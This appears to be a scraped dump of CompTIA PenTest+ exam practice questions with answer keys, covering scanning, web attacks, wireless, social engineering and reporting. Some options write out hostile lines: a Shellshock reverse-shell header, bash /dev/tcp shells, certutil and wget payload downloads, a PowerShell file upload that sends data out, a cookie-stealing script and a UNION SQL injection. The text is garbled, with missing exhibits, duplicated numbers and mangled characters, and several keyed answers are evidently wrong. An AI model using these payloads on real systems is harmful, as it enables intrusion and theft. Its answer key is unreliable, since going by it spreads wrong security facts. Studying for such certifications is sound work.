PT0-002 Practice Questions PDF
Document Details
Uploaded by DeadCheapLynx37
Todd
Tags
Summary
This document contains practice questions for the CompTIA PenTest+ exam. It covers topics like network security, web application security, and other security concepts. The document was created in July 2023 and is available as a PDF.
Full Transcript
100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) PT0-002 Dumps CompTIA PenTest+ Cer...
100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) PT0-002 Dumps CompTIA PenTest+ Certification Exam https://www.certleader.com/PT0-002-dumps.html The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) NEW QUESTION 1 A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network? A. Set up a captive portal with embedded malicious code. B. Capture handshakes from wireless clients to crack. C. Span deauthentication packets to the wireless clients. D. Set up another access point and perform an evil twin attack. Answer: C NEW QUESTION 2 A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap –O –A –sS –p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies. Answer: A NEW QUESTION 3 Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types? A. Nessus B. Metasploit C. Burp Suite D. Ethercap Answer: B NEW QUESTION 4 A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following tools will help the tester prepare an attack for this scenario? A. Hydra and crunch B. Netcat and cURL C. Burp Suite and DIRB D. Nmap and OWASP ZAP Answer: B NEW QUESTION 5 A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3 Answer: C Explanation: https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html https://scapy.readthedocs.io/en/latest/introduction.html#about-scapy NEW QUESTION 6 A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding? A. Prohibiting exploitation in the production environment B. Requiring all testers to review the scoping document carefully C. Never assessing the production networks D. Prohibiting testers from joining the team during the assessment Answer: The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) B NEW QUESTION 7 A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities? A. Launch an external scan of netblocks. B. Check WHOIS and netblock records for the company. C. Use DNS lookups and dig to determine the external hosts. D. Conduct a ping sweep of the company's netblocks. Answer: C NEW QUESTION 8 A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”} B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”} C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Answer: A NEW QUESTION 9 A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester? A. Situational awareness B. Rescheduling C. DDoS defense D. Deconfliction Answer: D Explanation: https://redteam.guide/docs/definitions/ NEW QUESTION 10 A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms? A. SQLmap B. DirBuster C. w3af D. OWASP ZAP Answer: C Explanation: W3AF, the Web Application Attack and Audit Framework, is an open source web application security scanner that includes directory and filename bruteforcing in its list of capabilities. NEW QUESTION 10 Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in? A. HTTPS communication B. Public and private keys C. Password encryption D. Sessions and cookies Answer: D NEW QUESTION 14 A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig: comptia.org. 3569 IN MX comptia.org- mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org. Which of the following potential issues can the penetration tester identify based on this output? A. At least one of the records is out of scope. B. There is a duplicate MX record. C. The NS record is not within the appropriate domain. The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) D. The SOA records outside the comptia.org domain. Answer: A NEW QUESTION 17 A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website? A. WHOIS domain lookup B. Job listing and recruitment ads C. SSL certificate information D. Public data breach dumps Answer: A Explanation: The BEST passive method of obtaining the technical contacts for the website would be a WHOIS domain lookup. WHOIS is a protocol that provides information about registered domain names, such as the registration date, registrant's name and contact information, and the name servers assigned to the domain. By performing a WHOIS lookup, the penetration tester can obtain the contact information of the website's technical staff, which can be used to craft a convincing phishing email. NEW QUESTION 22 Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance? A. Shodan B. Nmap C. WebScarab-NG D. Nessus Answer: B NEW QUESTION 25 A penetration tester gives the following command to a systems administrator to execute on one of the target servers: rm -f /var/www/html/G679h32gYu.php Which of the following BEST explains why the penetration tester wants this command executed? A. To trick the systems administrator into installing a rootkit B. To close down a reverse shell C. To remove a web shell after the penetration test D. To delete credentials the tester created Answer: C NEW QUESTION 30 A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? A. Cross-site request forgery B. Server-side request forgery C. Remote file inclusion D. Local file inclusion Answer: B NEW QUESTION 33 A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process? A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’) C. schtasks /query /fo LIST /v | find /I “Next Run Time:” D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe Answer: A Explanation: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-whil --- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk NEW QUESTION 37 A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24 The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Answer: A NEW QUESTION 40 During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue? A. Changing to Wi-Fi equipment that supports strong encryption B. Using directional antennae C. Using WEP encryption D. Disabling Wi-Fi Answer: A NEW QUESTION 41 For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information: Which of the following lines of code should the security engineer add to make the attack successful? A. window.location.= 'https://evilcorp.com' B. crossDomain: true C. geturlparameter ('username') D. redirectUrl = 'https://example.com' Answer: B NEW QUESTION 42 A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file? A. echo U3VQZXIkM2NyZXQhCg== | base64 €"d B. tar zxvf password.txt C. hydra €"l svsacct €"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 D. john --wordlist /usr/share/seclists/rockyou.txt password.txt Answer: A NEW QUESTION 43 Performing a penetration test against an environment with SCADA devices brings additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects. Answer: D Explanation: "A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the presence idle open connections may result into errors that cannot be handled by the devices. NEW QUESTION 46 During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT? A. Deny that the vulnerability existed B. Investigate the penetration tester. C. Accept that the client was right. D. Fire the penetration tester. Answer: B The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) NEW QUESTION 51 A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the client's employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC Answer: A NEW QUESTION 55 During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform? A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device. Answer: B Explanation: Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs. This allows access to calendars, contact lists, emails and text messages, and on some phones, users can copy pictures and private videos. NEW QUESTION 60 A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step? A. Perform a new penetration test. B. Remediate the findings. C. Provide the list of common vulnerabilities and exposures. D. Broaden the scope of the penetration test. Answer: B NEW QUESTION 64 A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program Answer: A NEW QUESTION 65 A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place? A. Maximizing the likelihood of finding vulnerabilities B. Reprioritizing the goals/objectives C. Eliminating the potential for false positives D. Reducing the risk to the client environment Answer: B Explanation: Goal Reprioritization Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization. NEW QUESTION 69 A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format? A. nmap -iL results 192.168.0.10-100 B. nmap 192.168.0.10-100 -O > results C. nmap -A 192.168.0.10-100 -oX results D. nmap 192.168.0.10-100 | grep "results" Answer: C NEW QUESTION 72 The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT? A. Badge cloning B. Watering-hole attack C. Impersonation D. Spear phishing Answer: D Explanation: Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system. NEW QUESTION 73 A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report? A. Delete the scheduled batch job. B. Close the reverse shell connection. C. Downgrade the svsaccount permissions. D. Remove the tester-created credentials. Answer: D NEW QUESTION 75 Which of the following expressions in Python increase a variable val by one (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1 Answer: CF Explanation: https://pythonguides.com/increment-and-decrement-operators-in-python/ NEW QUESTION 78 A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis? A. nmap –oG list.txt 192.168.0.1-254 , sort B. nmap –sn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’ C. nmap –-open 192.168.0.1-254, uniq D. nmap –o 192.168.0.1-254, cut –f 2 Answer: B Explanation: the NMAP flag (-sn) which is for host discovery and returns that kind of NMAP output. And the AWK command selects column 5 ({print $5}) which obviously carries the returned IP of the host in the NMAP output. NEW QUESTION 81 The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons learned during the engagement Answer: C NEW QUESTION 86 A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider? A. inurl: B. link: C. site: D. intitle: Answer: C NEW QUESTION 88 Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2 Answer: A NEW QUESTION 93 A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize? A. -8 -T0 B. --script "http*vuln*" C. -sn D. -O -A Answer: B NEW QUESTION 94 A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts? A. Tailgating B. Dumpster diving C. Shoulder surfing D. Badge cloning Answer: D NEW QUESTION 97 Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords Answer: A NEW QUESTION 98 A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? A. Aircrack-ng B. Wireshark C. Wifite D. Kismet Answer: A NEW QUESTION 99 The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following: * Connected to 10.2.11.144 (::1) port 80 (#0) > GET /readmine.html HTTP/1.1 > Host: 10.2.11.144 > User-Agent: curl/7.67.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 < Date: Tue, 02 Feb 2021 21:46:47 GMT < Server: Apache/2.4.41 (Debian) < Content-Length: 317 < Content-Type: text/html; charset=iso-8859-1 < WordPress › ReadMe Which of the following tools would be BEST for the penetration tester to use to explore this site further? A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP Answer: C NEW QUESTION 104 During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.) A. Cross-site scripting B. Server-side request forgery C. SQL injection D. Log poisoning E. Cross-site request forgery F. Command injection Answer: DF Explanation: Local File Inclusion (LFI) is a web vulnerability that allows an attacker to include files on a server through the web browser. This can expose sensitive information or lead to remote code execution. Some possible next steps that a penetration tester can try after exploiting an LFI vulnerability are: Log poisoning: This involves injecting malicious code into the web server’s log files and then including them via LFI to execute the code34. PHP wrappers: These are special streams that can be used to manipulate files or data via LFI. For example, php://input can be used to pass arbitrary data to an LFI script, or php://filter can be used to encode or decode files5. NEW QUESTION 107 A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng Answer: C NEW QUESTION 108 Which of the following tools provides Python classes for interacting with network protocols? A. Responder B. Impacket C. Empire D. PowerSploit Answer: B NEW QUESTION 113 A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) A. Prying the lock open on the records room B. Climbing in an open window of the adjoining building C. Presenting a false employee ID to the night guard D. Obstructing the motion sensors in the hallway of the records room Answer: C Explanation: "to be conducted after hours and should not include circumventing the alarm or performing destructive entry" NEW QUESTION 117 A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website? A. var adr= ‘../evil.php?test=’ + escape(document.cookie); B.../../../../../../../../../../etc/passwd C. /var/www/html/index.php;whoami D. 1 UNION SELECT 1, DATABASE(),3- Answer: D NEW QUESTION 122 A penetration tester ran the following command on a staging server: python –m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell –exec bypass –f \\10.10.51.50\9891 C. bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit D. wget 10.10.51.50:9891/exploit Answer: D NEW QUESTION 123 During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited? A. Command injection B. Broken authentication C. Direct object reference D. Cross-site scripting Answer: C Explanation: Insecure direct object reference (IDOR) is a vulnerability where the developer of the application does not implement authorization features to verify that someone accessing data on the site is allowed to access that data. NEW QUESTION 126 A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router. Which of the following is MOST vulnerable to a brute-force attack? A. WPS B. WPA2-EAP C. WPA-TKIP D. WPA2-PSK Answer: A NEW QUESTION 128 Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? A. Whether the cloud service provider allows the penetration tester to test the environment B. Whether the specific cloud services are being used by the application C. The geographical location where the cloud services are running D. Whether the country where the cloud service is based has any impeding laws Answer: A NEW QUESTION 129 A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment? A. Exploiting a configuration weakness in the SQL database The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) B. Intercepting outbound TLS traffic C. Gaining access to hosts by injecting malware into the enterprise-wide update server D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates E. Establishing and maintaining persistence on the domain controller Answer: B NEW QUESTION 132 A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.) A. Redirecting output from a file to a remote system B. Building a scheduled task for execution C. Mapping a share to a remote system D. Executing a file on the remote system E. Creating a new process on all domain systems F. Setting up a reverse shell from a remote system G. Adding an additional IP address on the compromised system Answer: CD Explanation: WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands. NEW QUESTION 134 The following output is from reconnaissance on a public-facing banking website: Based on these results, which of the following attacks is MOST likely to succeed? A. A birthday attack on 64-bit ciphers (Sweet32) B. An attack that breaks RC4 encryption C. An attack on a session ticket extension (Ticketbleed) D. A Heartbleed attack Answer: B NEW QUESTION 135 Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe type-casting operations The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Answer: D NEW QUESTION 138 A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following combinations of tools would the penetration tester use to exploit this script? A. Hydra and crunch B. Netcat and cURL C. Burp Suite and DIRB D. Nmap and OWASP ZAP Answer: B NEW QUESTION 142 Which of the following assessment methods is MOST likely to cause harm to an ICS environment? A. Active scanning B. Ping sweep C. Protocol reversing D. Packet analysis Answer: A NEW QUESTION 145 A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task? A. Steganography B. Metadata removal C. Encryption D. Encode64 Answer: B Explanation: All other answers are a form of encryption or randomizing the data. NEW QUESTION 148 A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? A. Partially known environment testing B. Known environment testing C. Unknown environment testing D. Physical environment testing Answer: C NEW QUESTION 152 A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE? A. Cost ofthe assessment B. Report distribution C. Testing restrictions D. Liability Answer: B NEW QUESTION 154 A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? A. The timing of the scan B. The bandwidth limitations C. The inventory of assets and versions D. The type of scan Answer: C The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) NEW QUESTION 156 A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company? A. Data flooding B. Session riding C. Cybersquatting D. Side channel Answer: D Explanation: https://www.techtarget.com/searchsecurity/definition/side-channel-attack#:~:text=Side%2Dchannel%20attacks% NEW QUESTION 160 A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective? A. Gain access to the target host and implant malware specially crafted for this purpose. B. Exploit the local DNS server and add/update the zone records with a spoofed A record. C. Use the Scapy utility to overwrite name resolution fields in the DNS query response. D. Proxy HTTP connections from the target host to that of the spoofed host. Answer: D NEW QUESTION 164 A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social- engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing Answer: C NEW QUESTION 166 A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap -sT -vvv -O 192.168.1.2/24 -PO B. nmap -sV 192.168.1.2/24 -PO C. nmap -sA -v -O 192.168.1.2/24 D. nmap -sS -O 192.168.1.2/24 -T1 Answer: D NEW QUESTION 169 Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue? A. Peach B. WinDbg C. GDB D. OllyDbg Answer: C Explanation: OLLYDBG, WinDBG, and IDA are all debugging tools that support Windows environments. GDB is a Linuxspecific debugging tool. NEW QUESTION 173 The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine? A. nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt B. nmap iR10oX out.xml | grep Nmap | cut d "f5 > live-hosts.txt C. nmap PnsV OiL target.txt A target_text_Service D. nmap sSPn n iL target.txt A target_txtl Answer: A Explanation: According to the Official CompTIA PenTest+ Self-Paced Study Guide1, the correct answer is A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt. The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) This command will perform a ping scan (-sn) without reverse DNS resolution (-n) on the IP range 10.1.1.0/24, excluding the attack machine’s IP address (10.1.1.15) from the scan (-exclude). It will also output the results in three formats (normal, grepable and XML) with a base name of target_txt (-oA). NEW QUESTION 174 A compliance-based penetration test is primarily concerned with: A. obtaining Pll from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. D. obtaining specific information from the protected network. Answer: C NEW QUESTION 176 A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform? A. Look for open ports. B. Listen for a reverse shell. C. Attempt to flood open ports. D. Create an encrypted tunnel. Answer: A NEW QUESTION 179 A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.” Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.) A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team D. Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address E. Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop F. Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements Answer: CD NEW QUESTION 181 A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment? A. The web server is using a WAF. B. The web server is behind a load balancer. C. The web server is redirecting the requests. D. The local antivirus on the web server Is rejecting the connection. Answer: A Explanation: A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks. If a WAF detects an attack, it will often reset the TCP connection, causing the connection to be terminated. As a result, a penetration tester may see TCP resets when a WAF is The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) present. Therefore, the most likely reason for the TCP resets returning from the web server is that the web server is using a WAF. NEW QUESTION 183 A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? A. Add a dependency checker into the tool chain. B. Perform routine static and dynamic analysis of committed code. C. Validate API security settings before deployment. D. Perform fuzz testing of compiled binaries. Answer: A NEW QUESTION 188 A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended? A. Change line 2 to $ip= €10.192.168.254€; B. Remove lines 3, 5, and 6. C. Remove line 6. D. Move all the lines below line 7 to the top of the script. Answer: B Explanation: https://www.asc.ohio-state.edu/lewis.239/Class/Perl/perl.html Example script: #!/usr/bin/perl $ip=$argv; attack($ip); sub attack { print("x"); } NEW QUESTION 189 A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials? A. Use Patator to pass the hash and Responder for persistence. B. Use Hashcat to pass the hash and Empire for persistence. C. Use a 